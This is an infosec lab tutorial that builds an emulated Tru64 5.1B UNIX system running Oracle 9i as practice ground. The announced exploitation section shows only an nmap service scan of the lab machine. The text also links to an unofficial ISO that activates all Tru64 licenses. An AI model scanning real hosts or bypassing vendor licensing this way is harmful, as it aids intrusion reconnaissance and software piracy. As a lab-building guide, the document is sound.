This is something I have been working on for some time. People often forget older technology that becomes useless and obsolete, but I find it useful in infosec education as well as a platform to practice skills against unusual environment (obsolete commercial UNIX)
![]()
Since this is a lengthy article that will include multiple steps I will split it to 4 sections.
- Pre-requsites
- Installation of Tru64 5.1B UNIX in a simulator
- Installation of Oracle 9i database inside simulated Tru64 5.1B UNIX
- Exploitation of Oracle 9i and gaining remote SSH access to Tru64 UNIX
Pre-requisites
This exercise was done purely on Linux Mint 19.2 x86_64, and therefore a similar debian based system is optimal for use. We will need the alphavm_free Alpha emulator for x86_64 Linux as well as some Linux tools TUN/TAP and bridgeutils
- 64bit Linux – Debian based
- 4 GB RAM minimum+ 100 GB HDD (your average laptop – Im using the Panasonic CF-53 for this)
-
alphavm_free (https://drop.me/o2ewWB) md5sum 508f172a23d844663ec6d354c11c74a0
- Networking scripts needed for TCP/IP in the simulator
- apt-get install socat uml-utilities bridge-utils nmap
- openjdk java (Im using openjdk version “11.0.4”)
# Typical networking script used along the simulator
# Where the internet connected interface is the Wireless wlan0
# This can of course be customized to ones needs
# This script needs to be executed prior the simulator start as root
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl setfd br0 0
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE
Installation of Tru64 5.1B UNIX in a simulator
So lets prepare the environment first on our Linux host (this will be the naming convention further on)
We start by creating our working directory and 3 virtual disks
disk01.dd <—– 22 GB —- TRU64 5.1B + ORACLE
disk02.dd <—– 2 GB —- buffer backup space (not really needed)
$ mkdir $HOME/TRU64
$ cd $HOME/TRU64
$ dd if=/dev/zero of=disk01.dd bs=1024 count=22M
$ dd if=/dev/zero of=disk02.dd bs=1024 count=2M
Next we download the Tru64 5.1B images , they are available on https://winworldpc.com/product/tru64/51b and we truly only need the CD1 ISO (but you can download them all)
The GNU opensource pack for Tru64 ISO https://mega.nz/#!O00TTaoR!tiDuGfnPgtlc54BBTQo4_IEmyz5rQWvx9QjmIultD1g and the LIC ISO https://mega.nz/#!y10VEY5S!rJJ3JByYkHyaPssaBiMR5k7YeWiIVOBBP8exjeJKvX8
We shall save the iso files in the ISO directory of the $HOME/TRU64
drwxr-xr-x 3 root root 4096 Jul 20 22:49 .
drwxr-xr-x 5 root root 4096 Jul 29 20:54 ..
-rw-r--r-- 1 root root 562698240 May 17 21:18 gnu.tru64.iso
-rw-r--r-- 1 root root 911360 May 16 21:37 lic.iso
-rw-r--r-- 1 root root 676808704 Jan 17 2017 tru64-cd1.iso
-rw-r--r-- 1 root root 658432000 Jan 17 2017 tru64-cd2.iso
-rw-r--r-- 1 root root 616757248 Jan 17 2017 tru64-cd3.iso
-rw-r--r-- 1 root root 193886208 Jan 17 2017 tru64-cd4.iso
Next we create the config.emu to boot the first Tru64 5.1B ISO and place it in $HOME/TRU64
system {
type = ds10_616;
reported_type = default;
num_cpus = 1;
ssn = 'EmuVM-00-000-001';
interval_clock_freq = 1000;
memory {
size = 1024;
}
cpu {
server = basic;
jit {
async = yes;
}
}
serial com1 {
server = socket;
port = 3000;
}
scsi_controller qla0 {
scsi_id = 7;
}
scsi_controller qla1 {
scsi_id = 7;
}
scsi_disk dka0 {
scsi_bus = 0;
scsi_id = 0;
scsi_lun = 0;
file = 'disk01.dd';
caching = no;
write_through = yes;
}
scsi_disk dka1 {
scsi_bus = 0;
scsi_id = 2;
scsi_lun = 0;
file = 'disk02.dd';
caching = no;
write_through = yes;
}
scsi_cdrom iso {
scsi_id = 4;
file = 'ISO/tru64-cd1.iso';
}
ether eth0 {
type = dec21040;
server = tap;
interface = 'tap0';
mac_address = 0x08002B000001;
}
}
We create a connect.console.sh script in $HOME/TRU64
socat -,raw,echo=0,escape=0x1c tcp:127.0.0.1:3000
We should have the following files in $HOME/TRU64
-rwxr-xr-x 1 root root 3241128 Sep 23 21:56 alphavm_free
-rw-r--r-- 1 root root 850 Sep 26 21:13 config.emu
-rwxr--r-- 1 root root 50 Sep 23 21:46 connect.console.sh
-rw-r--r-- 1 root root 23622320128 Sep 28 22:13 disk01.dd
drwxr-xr-x 3 root root 4096 Sep 23 21:56 ISO
For the Tru64 5.1B simulations we need to use 2 terminal windows, in first A the simulator will run and in B the socat script will connect to A
So we first start by running the simulator in terminal A as root in $HOME/TRU64
./alphavm_free config.emu
And connect to it from terminal B as normal user in $HOME/TRU64 by executing the connect.console.sh
./connect.console.sh
Once the Alpha firmware start to boot we will end up in the SRM console and we can tell it to boot the CD-ROM @ dka400
![]()
Then we go on installing Tru64 5.1B as per screenshots below
![]()
![]()
![]()
![]()
![]()
![]()
Now we need to be careful with the filesystem layout, look carefully on the selection, since any mistakes here will hinder the further exercise disfunctional
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
And installation will start from this step, it takes considerable amount of time (around 40 minutes to finish, so be patient)
IMPORTANT – After the installer finishes and re-compiles the new kernel, whole system goes automatically for reboot and will eventually get stuck in the following console screen
![]()
We need to terminate the simulator by CTRL+C in the terminal A since it gets stuck and tell the Alpha SRM console to boot single user so we can fix this. Again in terminal A launch the simulator
./alphavm_free config.emu
And in terminal B connect yet again via the connect.console.sh
Boot single user dua0 disk (with Tru64 5.1B installed on)
>>>> set boot_osflags s
>>>> boot dua0
Once in the root shell prompt remount / as RW
# mountroot -u /
Mount /usr
# mount /usr
Make tmp
# mkdir /var/tmp
Export term to vt100
# TERM=vt100
# export TERM
Disable the lat service
# chmod a-x /sbin/init.d/lat
Remove the LAT reference from /etc/rc.config ;delete below lines using vi editor
LAT_SETUP="1"
export LAT_SETUP
Shutdown the system
# shutdown -p now
Restart the terminal A simulator again
./alphavm_free config.emu
Connect to the simulator from terminal B and set multiuser boot in Alpha SRM console and boot the system
>>>> set boot_osflags a
>>>> boot dka0
We shoud be able to login now to the freshly installed Tru64 5.1B UNIX but we will exit the installer for now (option 6) since we will need to load the LIC script on first.
![]()
So shut down the Tru64 5.1B UNIX again
# shutdown -p now
In the $HOME/TRU64 on our Host we edit the config.emu file and add the LIC.ISO under the scsi cdrom section as follows
scsi_cdrom iso {
scsi_id = 4;
file = 'ISO/lic.iso';
}
Next we run the simulator from Terminal A again
./alphavm_free config.emu
Connect to it from Terminal B via the connect.console.sh
./connect.console.sh
Boot the system from the Alpha SRM console
>>> boot dka0
Login as root and mount the virtual scsi CDROM and execute the file.sh
# mkdir /mnt/cdrom
# mount -t cdfs -o noversion /devices/disk/cdrom0c /mnt/cdrom
# cd /mnt/cdrom
# ./file.sh
Now that we are done installing the LICs we can check if they are loaded properly
# lmf list
<-----CUT------>
ACAS-RT active unlimited
ACAS-DEV active unlimited
ACAS active unlimited
ABS-UNIX-CLIENT-USER active unlimited
ABS-NT-CLIENT-USER active unlimited
ABDAS-U active unlimited
400-SMTP-GW active unlimited
So we are almost done here – now lets setup the network, start sysman
# sysman Networking
![]()
Next we shall set the fixed IP address that I will be using throughout the exercise, so if you wish to go custom, keep that in mind and change accordingly. We will use the following values
- tru64.virtual.com 10.0.2.100 – static
- gateway 10.0.2.2
- dns 8.8.8.8
![]()
![]()
![]()
So once we are done we can check we can ping the gateway and see if the newtork is up
# ifconfig -a
lo0: flags=100c89<UP,LOOPBACK,NOARP,MULTICAST,SIMPLEX,NOCHECKSUM>
inet 127.0.0.1 netmask ff000000 ipmtu 4096
sl0: flags=10<POINTOPOINT>
tu0: flags=c63<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST,SIMPLEX>
inet 10.0.2.100 netmask ffffff00 broadcast 10.0.2.255 ipmtu 1500
tu1: flags=c22<BROADCAST,NOTRAILERS,MULTICAST,SIMPLEX>
tun0: flags=80<NOARP>
tun1: flags=80<NOARP>
Next we need to configure the DNS client , start sysman again
# sysman Networking
![]()
![]()
Lets see if all works
# ping netbsd.org
PING netbsd.org (199.233.217.205): 56 data bytes
64 bytes from 199.233.217.205: icmp_seq=0 ttl=240 time=165 ms
64 bytes from 199.233.217.205: icmp_seq=1 ttl=240 time=159 ms
^C
----netbsd.org PING Statistics----
2 packets transmitted, 2 packets received, 0% packet loss
round-trip (ms) min/avg/max = 159/162/165 ms
Looks good now ! :) Lets now setup a few other things now like a local user so that we can use a CDE desktop in Tru64 5.1B via Xephyr from our Host, but most importanly the VNC server so that we can install Oracle 9i – X11 forwarding is a little tricky to get right via Xephyr so its actually much easier to install VNC server from the GNU toolkit ISO and use VNC client from the Host to configure everything (hell you can even tunnel VNC over SSH if you are a security freak)
We can simply try if Xephyr will catch the remote X11 dekstop from the simulated Tru64 5.1B by running the following from a new Terminal on our Linux Host
$linux box > Xephyr -screen 980x640 -ac -query 10.0.2.100 :3
![]()
But since root login is forbidden to log-on via network by defaut on Tru64 5.1B we will need to configure the local users first.
Lets shut down Tru64 again so we can add the GNU toolkit ISO to the config.emu issue the shutdown command from Terminal B
# shutdown -p now
Swap the lic.iso for the gnu.tru64.iso
scsi_cdrom iso {
scsi_id = 4;
file = 'ISO/gnu.tru64.iso';
}
Boot the simulator again from Terminal A by running
./alphavm_free config.emu
Connect to Alpha SRM console from Termianl B
./connect.console.sh
Boot the system from the Alpha SRM console
>>> boot dka0
Once logged in as root in Tru64, mount the GNU.ISO cdrom and execute the rpm-init.ksh
# mount -t cdfs -o noversion /devices/disk/cdrom0c /mnt
# cd /mnt
# cd setup
# ./rpm-init.ksh
Restoring the rpmkit archive...
initializing your new rpm database...
Finished installing RPM on your system.
Install the needed rpms
# cd ..
# cd rpms/alpha
# /usr/local/bin/rpm -ivh texinfo-4.0-4.alpha.rpm
# /usr/local/bin/rpm -ivh bash-2.05-5.alpha.rpm
# /usr/local/bin/bash
# /usr/local/bin/rpm -ivh vnc-3.3.3-2.alpha.rpm
# /usr/local/bin/rpm -ivh wget-1.6-4.alpha.rpm
We should be ready now for the next step – installing Oracle 9i
Installation of Oracle 9i database inside simulated Tru64 5.1B UNIX
So lets download the Oracle install sets now. We get the Oracle Tru64 9201 disk images from https://mirrors.pdp-11.ru/_alpha/_oracle/9.201/ The download will take some time so be patient (takes about 2 hrs via wget)
Back on Tru64
# mkdir /usr/oracle
# cd /usr/oracle
# /usr/local/bin/wget http://mirrors.pdp-11.ru/_alpha/_oracle/9.201/Tru64_9201_Disk1.cpio.gz
# /usr/local/bin/wget http://mirrors.pdp-11.ru/_alpha/_oracle/9.201/Tru64_9201_Disk2.cpio.gz
# /usr/local/bin/wget http://mirrors.pdp-11.ru/_alpha/_oracle/9.201/Tru64_9201_Disk3.cpio.gz
# /usr/local/bin/wget http://mirrors.pdp-11.ru/_alpha/_oracle/9.201/Tru64_9201_Disk4.cpio.gz
When we finish downloading we should have these files
bash-2.05# ls -al
total 2136200
drwxr-xr-x 2 root system 8192 Sep 26 22:13 .
drwxr-xr-x 30 root system 8192 Sep 26 21:10 ..
-rw-r--r-- 1 root system 588524171 Dec 17 2003 Tru64_9201_Disk1.cpio.gz
-rw-r--r-- 1 root system 492737069 Dec 17 2003 Tru64_9201_Disk2.cpio.gz
-rw-r--r-- 1 root system 592357965 Dec 17 2003 Tru64_9201_Disk3.cpio.gz
-rw-r--r-- 1 root system 513816553 Dec 17 2003 Tru64_9201_Disk4.cpio.gz
Next we unzip them
bash-2.05# gunzip Tru64_9201_Disk1.cpio.gz
bash-2.05# gunzip Tru64_9201_Disk2.cpio.gz
bash-2.05# gunzip Tru64_9201_Disk3.cpio.gz
bash-2.05# gunzip Tru64_9201_Disk4.cpio.gz
And then unpack the cpio archives
bash-2.05# cpio -idcmv < Tru64_9201_Disk1.cpio
bash-2.05# cpio -idcmv < Tru64_9201_Disk2.cpio
bash-2.05# cpio -idcmv < Tru64_9201_Disk3.cpio
bash-2.05# cpio -idcmv < Tru64_9201_Disk4.cpio
Next we delete the cpio archives as they are not needed anymore and we would need the space
bash-2.05# rm *.cpio
We should have 4 directories now in /usr/oracle
bash-2.05# ls -al
total 48
drwxr-xr-x 6 root system 8192 Sep 26 23:37 .
drwxr-xr-x 30 root system 8192 Sep 26 21:10 ..
drwxr-xr-x 8 2840 42424 8192 Jun 14 2002 Disk1
drwxr-xr-x 3 2840 42424 8192 Jun 14 2002 Disk2
drwxr-xr-x 3 2840 42424 8192 Jun 14 2002 Disk3
drwxr-xr-x 3 2840 42424 8192 Jun 14 2002 Disk4
Next we check the Tru64 5.1B Kernel parameters and adust the needed for Oracle 9i
bash-2.05# /sbin/sysconfig -q ipc
ipc:
msg_max = 8192
msg_mnb = 16384
msg_mni = 64
msg_tql = 40
shm_max = 4194304
shm_min = 1
shm_mni = 128
shm_seg = 32
sem_mni = 16
sem_msl = 25
sem_opm = 10
sem_ume = 10
sem_vmx = 32767
sem_aem = 16384
sem_broadcast_wakeup = 0
max_kernel_ports = 93728
ssm_threshold = 8388608
ssm_enable_core_dump = 1
shm_allocate_striped = 1
shm_enable_core_dump = 1
pshared_hash_size = 2048
bash-2.05#
bash-2.05# /sbin/sysconfig -q proc
proc:
max_proc_per_user = 256
max_threads_per_user = 1024
per_proc_stack_size = 8388608
max_per_proc_stack_size = 33554432
per_proc_data_size = 134217728
max_per_proc_data_size = 1073741824
max_per_proc_address_space = 4294967296
per_proc_address_space = 4294967296
executable_stack = 0
autonice = 0
autonice_time = 600
autonice_penalty = 4
open_max_soft = 4096
open_max_hard = 4096
ncallout_alloc_size = 8192
round_robin_switch_rate = 0
sched_min_idle = 0
give_boost = 1
maxusers = 1024
num_wait_queues = 1024
num_timeout_hash_queues = 1024
enhanced_core_name = 0
enhanced_core_max_versions = 16
exec_disable_arg_limit = 0
dump_cores = 1
dump_setugid_cores = 0
We will need to append to the end of /etc/sysconfigtab the following values
vm:
vm_bigpg_enabled = 0
ipc:
shm_max = 4278190080
shm_min = 1
shm_mni = 256
shm_seg = 128
proc:
max_per_proc_stack_size = 33554432
per_proc_stack_size = 33554432
per_proc_data_size = 335544320
vfs:
fifo_do_adaptive = 0
So the final result will look like this
<---CUT---->
vm:
swapdevice=/dev/disk/dsk0g
vm-swap-eager=1
vm_bigpg_enabled = 0
ipc:
shm_max = 4278190080
shm_min = 1
shm_mni = 256
shm_seg = 128
proc:
max_per_proc_stack_size = 33554432
per_proc_stack_size = 33554432
per_proc_data_size = 335544320
vfs:
fifo_do_adaptive = 0
We need to reboot Tru64 5.1B in order for the changes to kick in
# reboot
Once rebooted check we have Java in place
# java -version
java version "1.3.1"
Java(TM) 2 Runtime Environment, Standard Edition
Fast VM (build 1.3.1-2, native threads, mixed mode, 01/16/2002-13:22)
Create the new groups and users.
# groupadd oinstall
# groupadd dba
# groupadd oper
# groupadd apache
# useradd -g oinstall -G dba -m oracle
# passwd oracle
# useradd -g oinstall -G apache apache
# passwd apache
Create the directories in which the Oracle software will be installed.
# mkdir -p /usr/u01/app/oracle/product/9.2.0.1.0
# chown -R oracle.oinstall /usr/u01/app
# ln -s /usr/u01 /
Lets start the VNC server now so we can configure and install Oracle
Login as oracle
# su - oracle
tru64.virtual.com>
Now we need to add some paths to the Oracle .profile
tru64.virtual.com> vi .profile
if [ ! "$DT" ]; then
stty dec
tset -I -Q
fi
PS1="`hostname`> "
MAIL=/usr/spool/mail/$USER
PATH=/sbin:/usr/sbin:/usr/bin:/usr/ccs/bin:/usr/bin/X11:/usr/local/bin
export PATH
# Oracle 9i
ORACLE_BASE=/u01/app/oracle; export ORACLE_BASE
ORACLE_HOME=$ORACLE_BASE/product/9.2.0.1.0; export ORACLE_HOME
ORACLE_TERM=xterm; export ORACLE_TERM
PATH=$PATH:$ORACLE_HOME/bin:/usr/opt/java131/bin; export PATH
ORACLE_SID=TSH1; export ORACLE_SID
LD_LIBRARY_PATH=$ORACLE_HOME/lib; export LD_LIBRARY_PATH
CLASSPATH=$ORACLE_HOME/JRE:$ORACLE_HOME/jlib:$ORACLE_HOME/rdbms/jlib; export CLASSPATH
DISPLAY=tru64.virtual.com:1.0; export DISPLAY
stty erase ^H
ksh -o emacs
set filec
tru64.virtual.com> bash
bash-2.05$ vncserver :1
![]()
But we want to have a nice CDE desktop right ? Exit VNC session and kill vncserver
bash-2.05$ vncserver -kill :1
Lets edit the xstartup script
bash-2.05$ vi $HOME/.vnc/xstartup
And make sure we init CDE instead of TWM
#!/bin/sh
/usr/dt/bin/Xsession &
Again we start VNC server on our Tru64
bash-2.05$ vncserver :1
And conncet from your Linux Host via VNC client, once in VNC CDE session open a terminal and run
$ xhost +tru64.virtual.com
Its better to save the above comman in the oracle $HOME/ .profie
We are ready to start the Oracle Universal Installer (OUI) from the VNC CDE terminal by issuing the following command in the Disk1 directory.
![]()
$ cd /usr/oracle/Disk1
$ ./runInstaller
Continue with the installation as normal. I will share the Oracle installer screenshots next.
![]()
![]()
![]()
![]()
Here we need to got to Terminal A and exit from the oracle shell back to root so we can run the /tmp/oraInstRoot.sh script
![]()
(remember the pesky noexecs on /tmp on hardened Linux systems :) ) After it runs return back to the VNC CDE session and click “continue”
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
Oracle 9i Tru64 5.1B Post Installation
Edit the “/etc/oratab” file setting the restart flag for each instance to ‘Y’.
TSH1:/u01/app/oracle/product/9.2.0.1.0:Y
Create a file called /sbin/init.d/oracle containing the following.
Best way is to FTP this to the simulated Tru64, since the native vi buffer is small
#!/bin/sh
#
# change the value of ORACLE_HOME to be correct for your
# installation
ORACLE_HOME=/u01/app/oracle/product/9.2.0.1.0
PATH=${PATH}:$ORACLE_HOME/bin
HOST=`hostname`
#
# change the value of ORACLE to the login name of the
# oracle owner at your site
#
ORACLE=oracle
export ORACLE_HOME PATH
#
if [ ! "$2" = "ORA_DB" ] ; then
rsh $HOST -l $ORACLE /sbin/init.d/oracle $1 ORA_DB
exit
fi
#
LOG=$ORACLE_HOME/startup.log
touch $LOG
chmod a+r $LOG
#
case $1 in
'start')
echo "$0: starting up" >> $LOG
date >> $LOG
# Start Oracle Net
if [ -f $ORACLE_HOME/bin/tnslsnr ] ;
then
echo "starting Oracle Net listener"
$ORACLE_HOME/bin/lsnrctl start >> $LOG 2>&1 &
fi
echo "starting Oracle databases"
$ORACLE_HOME/bin/dbstart >> $LOG 2>&1
;;
'stop')
echo "$0: shutting down" >> $LOG
date >> $LOG
# Stop Oracle Net
if [ -f $ORACLE_HOME/bin/tnslsnr ] ;
then
echo "stopping Oracle Net listener"
$ORACLE_HOME/bin/lsnrctl stop >> $LOG 2>&1
fi
echo "stopping Oracle databases"
$ORACLE_HOME/bin/dbshut >> $LOG 2>&1
;;
*)
echo "usage: $0 {start|stop}"
exit
;;
esac
#
exit
On Tru64 move the oracle file to /sbin/init.d/
bash-2.05# mv /usr/users/oracle/oracle /sbin/init.d/
bash-2.05# chmod 750 /sbin/init.d/oracle
bash-2.05# ln -s /sbin/init.d/oracle /sbin/rc3.d/S99oracle
bash-2.05# ln -s /sbin/init.d/oracle /sbin/rc0.d/K01oracle
Add root user to the dba and oinstall groups (/etc/group) to allow the script to function correctly. The relevant instances should now startup/shutdown automatically at system startup/shutdown.
oinstall:*:200:root
dba:*:201:oracle,root
We reboot Tru64 5.1B to see how it comes up with the DBs and all
bash-2.05# reboot
Login as oracle and add these scripts in $HOME
ORACLE - startup
bash-2.05$ cat STARTUP
$ORACLE_HOME/bin/lsnrctl start
$ORACLE_HOME/bin/dbstart
ORACLE - shutdown
bash-2.05$ cat SHUTDOWN
$ORACLE_HOME/bin/lsnrctl stop
$ORACLE_HOME/bin/dbshut
Make them executable and run the STARTUP script
bash-2.05$ chmod +x STARTUP
bash-2.05$ chmod +x SHUTDOWN
bash-2.05$ ./STARTUP
LSNRCTL for Compaq Tru64 UNIX: Version 9.2.0.1.0 - Production on 28-SEP-2019 13:16:08
Copyright (c) 1991, 2002, Oracle Corporation. All rights reserved.
Starting /u01/app/oracle/product/9.2.0.1.0/bin/tnslsnr: please wait...
TNSLSNR for Compaq Tru64 UNIX: Version 9.2.0.1.0 - Production
System parameter file is /u01/app/oracle/product/9.2.0.1.0/network/admin/listener.ora
Log messages written to /u01/app/oracle/product/9.2.0.1.0/network/log/listener.log
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=tru64.virtual.com)(PORT=1521)))
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC)))
STATUS of the LISTENER
------------------------
Alias LISTENER
Version TNSLSNR for Compaq Tru64 UNIX: Version 9.2.0.1.0 - Production
Start Date 28-SEP-2019 13:16:08
Uptime 0 days 0 hr. 0 min. 0 sec
Trace Level off
Security OFF
SNMP OFF
Listener Parameter File /u01/app/oracle/product/9.2.0.1.0/network/admin/listener.ora
Listener Log File /u01/app/oracle/product/9.2.0.1.0/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=tru64.virtual.com)(PORT=1521)))
Services Summary...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
Service "oracle" has 1 instance(s).
Instance "TSH1", status UNKNOWN, has 1 handler(s) for this service...
The command completed successfully
Can't find init file for Database "TSH1".
Database "TSH1" NOT started.
bash-2.05$
Something is not right – the TSH1 Database does not start, we get an error, this is because of /u01/app/oracle/product/9.2.0.1.0/bin/dbstart , upload the attached modified dbstart and replace it
:
#
# $Header: dbstart.sh.pp 03-apr-2001.13:38:21 jboyce Exp $ dbstart.sh.pp Copyr (c) 1991 Oracle
#
###################################
#
# usage: dbstart
#
# This script is used to start ORACLE from /etc/rc(.local).
# It should ONLY be executed as part of the system boot procedure.
#
#####################################
ORATAB=/etc/oratab
trap 'exit' 1 2 3
case $ORACLE_TRACE in
T) set -x ;;
esac
# Set path if path not set (if called from /etc/rc)
case $PATH in
"") PATH=/bin:/usr/bin:/etc
export PATH ;;
esac
# Save LD_LIBRARY_PATH
SAVE_LLP=$LD_LIBRARY_PATH
#
# Loop for every entry in oratab file and and try to start
# that ORACLE
#
cat $ORATAB | while read LINE
do
case $LINE in
\#*) ;; #comment-line in oratab
*)
# Proceed only if third field is 'Y'.
if [ "`echo $LINE | awk -F: '{print $3}' -`" = "Y" ] ; then
ORACLE_SID=`echo $LINE | awk -F: '{print $1}' -`
if [ "$ORACLE_SID" = '*' ] ; then
ORACLE_SID=""
fi
# Called programs use same database ID
export ORACLE_SID
ORACLE_HOME=`echo $LINE | awk -F: '{print $2}' -`
# Called scripts use same home directory
export ORACLE_HOME
# Put $ORACLE_HOME/bin into PATH and export.
PATH=$ORACLE_HOME/bin:/bin:/usr/bin:/etc ; export PATH
# add for bug # 652997
LD_LIBRARY_PATH=${SAVE_LLP}:${ORACLE_HOME}/lib ; export LD_LIBRARY_PATH
PFILE=${ORACLE_HOME}/dbs/init${ORACLE_SID}.ora
SPFILE=${ORACLE_HOME}/dbs/spfile${ORACLE_SID}.ora
# See if it is a V6 or V7 database
VERSION=undef
if [ -f $ORACLE_HOME/bin/sqldba ] ; then
SQLDBA=sqldba
VERSION=`$ORACLE_HOME/bin/sqldba command=exit | awk '
/SQL\*DBA: (Release|Version)/ {split($3, V, ".") ;
print V[1]}'`
case $VERSION in
"6") ;;
*) VERSION="internal" ;;
esac
else
if [ -f $ORACLE_HOME/bin/svrmgrl ] ; then
SQLDBA=svrmgrl
VERSION="internal"
else
SQLDBA="sqlplus /nolog"
fi
fi
STATUS=1
if [ -f $ORACLE_HOME/dbs/sgadef${ORACLE_SID}.dbf ] ; then
STATUS="-1"
fi
if [ -f $ORACLE_HOME/dbs/sgadef${ORACLE_SID}.ora ] ; then
STATUS="-1"
fi
pmon=`ps -ef | egrep pmon_$ORACLE_SID | grep -v grep`
if [ "$pmon" != "" ];
then
STATUS="-1"
echo "Database \"${ORACLE_SID}\" already started."
fi
if test $STATUS -eq -1 ; then
echo ""
echo "Database \"${ORACLE_SID}\" possibly left running when system went down (system crash?)."
echo "Notify Database Administrator."
case $VERSION in
"6") sqldba "command=shutdown abort" ;;
"internal") $SQLDBA $args <<EOF
connect internal
shutdown abort
EOF
;;
*) $SQLDBA $args <<EOF
connect /as sysdba
shutdown abort
EOF
;;
esac
if test $? -eq 0 ; then
STATUS=1
else
echo "Database \"${ORACLE_SID}\" NOT started."
fi
fi
if test $STATUS -eq 1 ; then
if [ -f $PFILE -o -f $SPFILE ] ; then
case $VERSION in
"6") sqldba command=startup ;;
"internal") $SQLDBA <<EOF
connect internal
startup
EOF
;;
*) $SQLDBA <<EOF
connect / as sysdba
startup
EOF
;;
esac
if test $? -eq 0 ; then
echo ""
echo "Database \"${ORACLE_SID}\" warm started."
else
echo ""
echo "Database \"${ORACLE_SID}\" NOT started."
fi
else
echo ""
echo "Can't find init file for Database \"${ORACLE_SID}\"."
echo "Database \"${ORACLE_SID}\" NOT started."
fi
fi
fi
;;
esac
done
bash-2.05$ mv dbstart /u01/app/oracle/product/9.2.0.1.0/bin/
bash-2.05$ cd /u01/app/oracle/product/9.2.0.1.0/bin/
bash-2.05$ chown oracle:oinstall dbstart
bash-2.05$ chmod a+x dbstart
We can now start the ORACLE DB via the STARTUP script
bash-2.05$ ./STARTUP
LSNRCTL for Compaq Tru64 UNIX: Version 9.2.0.1.0 - Production on 28-SEP-2019 17:20:47
Copyright (c) 1991, 2002, Oracle Corporation. All rights reserved.
Starting /u01/app/oracle/product/9.2.0.1.0/bin/tnslsnr: please wait...
TNSLSNR for Compaq Tru64 UNIX: Version 9.2.0.1.0 - Production
System parameter file is /u01/app/oracle/product/9.2.0.1.0/network/admin/listener.ora
Log messages written to /u01/app/oracle/product/9.2.0.1.0/network/log/listener.log
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=tru64.virtual.com)(PORT=1521)))
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC)))
STATUS of the LISTENER
------------------------
Alias LISTENER
Version TNSLSNR for Compaq Tru64 UNIX: Version 9.2.0.1.0 - Production
Start Date 28-SEP-2019 17:20:47
Uptime 0 days 0 hr. 0 min. 0 sec
Trace Level off
Security OFF
SNMP OFF
Listener Parameter File /u01/app/oracle/product/9.2.0.1.0/network/admin/listener.ora
Listener Log File /u01/app/oracle/product/9.2.0.1.0/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=tru64.virtual.com)(PORT=1521)))
Services Summary...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
Service "oracle" has 1 instance(s).
Instance "TSH1", status UNKNOWN, has 1 handler(s) for this service...
The command completed successfully
SQL*Plus: Release 9.2.0.1.0 - Production on Sat Sep 28 17:20:48 2019
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
SQL> Connected to an idle instance.
SQL> ORACLE instance started.
Total System Global Area 320310656 bytes
Fixed Size 732544 bytes
Variable Size 285212672 bytes
Database Buffers 33554432 bytes
Redo Buffers 811008 bytes
Database mounted.
Database opened.
SQL> Disconnected from Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.1.0 - Production
Database "TSH1" warm started.
Looks much better now, we have the TSH1 up !
When we want to stop the DB we run the SHUTDOWN script
bash-2.05$ ./SHUTDOWN
LSNRCTL for Compaq Tru64 UNIX: Version 9.2.0.1.0 - Production on 28-SEP-2019 18:43:31
Copyright (c) 1991, 2002, Oracle Corporation. All rights reserved.
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC)))
The command completed successfully
SQL*Plus: Release 9.2.0.1.0 - Production on Sat Sep 28 18:43:32 2019
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
SQL> Connected.
SQL> Database closed.
Database dismounted.
ORACLE instance shut down.
SQL> Disconnected from Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.1.0 - Production
Database "TSH1" shut down.
Of course we want the TSH1 to be up, so we re-load it again via the STARTUP script
bash-2.05$ ./STARTUP
So we are pretty much done in setting up an Oracle 9i DB on Tru64 5.1B here, lets move on to the fun part of the exercise – the infosec !
Exploitation of Oracle 9i and gaining remote SSH access to Tru64 UNIX
Now we can check with Nmap from our Linux Host how does the simulated Tru64 5.1B UNIX look like and what services are enabled there (default ones and Oracle default ones)
On our Linux Host we run our trusty Nmap
# nmap -sS -sV 10.0.2.100
Nmap scan report for 10.0.2.100
Host is up (0.0023s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Compaq Tru64 ftp server 5.60
22/tcp open ssh SCS sshd 2.4.1 (protocol 2.0)
23/tcp open telnet Openwall GNU/*/Linux telnetd
25/tcp open smtp Sendmail 8.11.1
110/tcp open pop3 QPop pop3d 3.0.2
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 1.6.24
512/tcp open exec
513/tcp open login Tru64 Unix logind
514/tcp open tcpwrapped
515/tcp open tcpwrapped
543/tcp open login Tru64 Unix logind
544/tcp open tcpwrapped
1026/tcp open ttdbserverd 1 (RPC #100083)
1027/tcp open IIS?
1057/tcp open oracle Oracle Database
